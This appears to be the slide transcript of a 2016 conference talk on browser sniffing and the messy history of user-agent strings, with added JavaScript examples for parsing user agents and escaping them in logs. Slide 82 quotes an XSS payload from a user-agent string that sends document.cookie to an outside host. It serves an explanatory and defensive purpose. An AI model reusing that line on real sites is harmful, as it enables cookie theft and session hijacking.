Everybody Lies @ Halfstack

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings, so this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

November 18, 2016
Transcript

  1. everybody lies
    Niels Leenheer
    halfstack, november 18th 2016
    @html5test

  4. warning: this talk is full of lies and deception

  8. yes… this talk is about browser sniffing

  9. why?

  10. browser sniffing is dirty

  11. you should use feature detection

  13. Dear Web Developers: Browser Sniffing is Stupid
    http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

  14. 5 Reasons Why Browser Sniffing Stinks
    https://www.sitepoint.com/why-browser-sniffing-stinks/

  15. Browser Detection is Bad
    https://css-tricks.com/browser-detection-is-bad/

  17. best-practices: feature detection, responsive design, progressive enhancement

  18. anti-pattern: browser sniffing

  19. browser sniffing is just a tool

  20. everybody uses browser sniffing

  22. what… is browser sniffing actually?

  23. the http specification defines the user-agent header
    it contains a string with information about the browser

  24. every request the browser makes to the server includes the user-agent header

  25. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

  26. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

  27. you can access the exact same string using javascript

  28. <script>
    <!--
    alert(navigator.userAgent);
    //-->
    </script>

  29. you can use the user-agent string to identify:
    the browser
    the rendering engine
    the operating system
    the device model
    and more

  31. what… is browser sniffing good for?

  32. knowledge

  33. if you know the platform or browser, you can streamline the user experience

  35. if you know your users, you can build a better site for them

  36. if you know which browser is being used, you can work around bugs

  37. if you know which browser is causing errors, you can fix them

  38. privacy implications

  41. changing your user agent string actually makes it easier to track you

  42. anonymity by looking like everybody else

  45. why… is browser sniffing so difficult?

  46. things started out simple

  47. Mosaic/0.9
    Mosaic

  48. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    “Mozilla” is the code name of the browser

  49. but it quickly started to get complicated

  50. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    “compatible” means compatible with Netscape Navigator 1.0

  51. Opera/8.54 (Windows 95; U; en)
    Opera

  52. Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
    Opera

  53. Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00
    Opera
    Version/10.00 is the real version of the browser

  54. Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5
    Firefox
    Gecko/20090624 is the build date of the rendering engine

  55. Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0
    Firefox
    the build date is no longer updated

  56. Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
    Firefox

  57. and it gets worse…

  58. Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
    Safari

  59. Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
    Chrome

  60. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
    Opera

  61. Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Internet Explorer

  62. Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
    Edge

  63. and those were all relatively normal user-agent strings

  64. sometimes browsers simply do not make sense at all

  65. Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
    Samsung Internet

  66. Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
    Nokia Xpress for Windows Phone

  67. sometimes browsers lie to hide their true identity

  68. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera

  69. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    “zbov” is “mobi” ROT 13 encrypted

  70. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer

  71. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s Internet Explorer 9
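As an added example (not code from the talk or from any sniffing library), the snippet below turns the precedence rules the strings above illustrate into a tiny sniffer: Version/ overrides Opera/, Trident overrides MSIE, and the most specific vendor token wins inside the WebKit family. The function names sniff and rot13 are my own.

```javascript
// Added example, not code from the talk: a minimal sniffer that applies the precedence
// rules the slides above illustrate, and shows why "first known token wins" parsing fails.
function rot13(s) {
  return s.replace(/[a-z]/gi, (c) => {
    const base = c <= 'Z' ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}
function sniff(ua) {
  const tok = (re) => { const m = ua.match(re); return m ? m[1] : null; };
  const out = { browser: 'unknown', version: null, notes: [] };
  // Opera up to 12: "Opera/9.80" is a frozen prefix, "Version/x" carries the real version.
  if (ua.startsWith('Opera/')) {
    out.browser = 'Opera';
    out.version = tok(/Version\/([\d.]+)/) || tok(/^Opera\/([\d.]+)/);
    // Opera Mobile in desktop mode hides "mobi" as ROT13 inside the platform token.
    if (/\bzbov\b/.test(ua)) {
      out.browser = 'Opera Mobile';
      out.notes.push('desktop mode: zbov = ' + rot13('zbov'));
    }
    return out;
  }
  // Internet Explorer: Trident/N is truthful (IE version = N + 4); the MSIE token is
  // lowered in compatibility view and absent altogether in IE 11 ("like Gecko").
  const trident = tok(/Trident\/(\d+)/);
  const msie = tok(/MSIE ([\d.]+)/);
  if (trident || msie) {
    out.browser = 'Internet Explorer';
    out.version = trident ? `${Number(trident) + 4}.0` : msie;
    if (trident && msie && parseFloat(msie) < parseFloat(out.version)) {
      out.notes.push('compatibility view');
    }
    return out;
  }
  // WebKit/Blink family: everyone carries "Safari", most carry "Chrome"; test the most specific vendor token first.
  const order = [
    ['Edge', /Edge\/([\d.]+)/],
    ['Opera', /OPR\/([\d.]+)/],
    ['Samsung Internet', /SAMSUNG.*Version\/([\d.]+).*Chrome\//],
    ['Chrome', /Chrome\/([\d.]+)/],
    ['Firefox', /Firefox\/([\d.]+)/],
    ['Safari', /Version\/([\d.]+).*Safari\//],
  ];
  for (const [name, re] of order) {
    const v = tok(re);
    if (v) { out.browser = name; out.version = v; return out; }
  }
  return out;
}
```

Feed it the strings from slides 53 to 71 and each lie is resolved the way the slide annotates it; swap the order of the WebKit checks and Edge and Opera both come back as Chrome.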

  72. sometimes browsers are just weird

  74. #1 Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
    #2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

  77. BORK BORK BORK

  81. and it is possible to change the user-agent string yourself

  82. alert("My Little Pony");
    document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;
    alt="My Little Pony">
    XSS attacks

  84. (╯°□°)╯︵ ┻━┻
    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    You’re site is
    funny people

  85. angry people

  86. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
    Seriously, Go fuck yourself
    W3C standards are important. Stop fucking obsessing over user-agent already.
    angry people

  87. 1.000.000 unique useragent strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

  88. user-agent strings cannot be trusted!
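The slides above show user-agent strings carrying script, so any page that renders them (an analytics dashboard, a log viewer) is a stored-XSS sink. As an added example, not code from the talk, the snippet below pulls the user agent out of constructed Apache combined-format log lines, escapes it for HTML output and flags entries that contain markup for review; the names processLog, renderUnsafe and renderSafe are my own.

```javascript
// Added example, not from the talk: the user-agent is attacker-controlled input. Anything that
// renders it (an analytics page, a log viewer) must escape it, and entries carrying markup are
// worth flagging so a stored-XSS attempt like the one on the slide surfaces in review.
// The log lines below are constructed for this example (Apache combined format).
const LOG = [
  '203.0.113.5 - - [18/Nov/2016:10:40:28 +0000] "GET / HTTP/1.1" 200 2436 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"',
  '203.0.113.9 - - [18/Nov/2016:10:41:02 +0000] "GET / HTTP/1.1" 200 2436 "-" "<script>alert(\'My Little Pony\')</script>"',
  '203.0.113.7 - - [18/Nov/2016:10:41:30 +0000] "GET / HTTP/1.1" 200 2436 "-" "Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)"',
];
// In combined format the user agent is the last quoted field of the line.
const UA_FIELD = /"([^"]*)"\s*$/;
// A tag start, a javascript: URL or an event-handler attribute: none of these belongs in a real UA.
const SUSPICIOUS = /<\s*\/?\s*[a-z]|javascript:|\bon[a-z]+\s*=/i;

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function extractUserAgent(line) {
  const m = line.match(UA_FIELD);
  return m ? m[1] : '';
}
// One row per log line: the raw UA for storage and analysis, an escaped copy for HTML
// output, and a review flag.
function processLog(lines) {
  return lines.map((line) => {
    const ua = extractUserAgent(line);
    return { ua, html: escapeHtml(ua), suspicious: SUSPICIOUS.test(ua) };
  });
}
// What a naive log viewer does (string concatenation of the raw value) beside the safe version.
function renderUnsafe(lines) {
  return processLog(lines).map((e) => `<td>${e.ua}</td>`).join('');
}
function renderSafe(lines) {
  return processLog(lines)
    .map((e) => `<td class="${e.suspicious ? 'flagged' : ''}">${e.html}</td>`)
    .join('');
}
```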

  89. everybody lies

  90. you should never use browser sniffing for controlling access to your website

  91. you should never use browser sniffing for determining browser capabilities

  92. you should never build your own browser sniffing library

  94. #1 use a browser sniffing library that is regularly updated

  95. #2 check if it is possible to automatically schedule updates

  97. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Gandhi

  99. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Adolf Hitler

  100. thank you!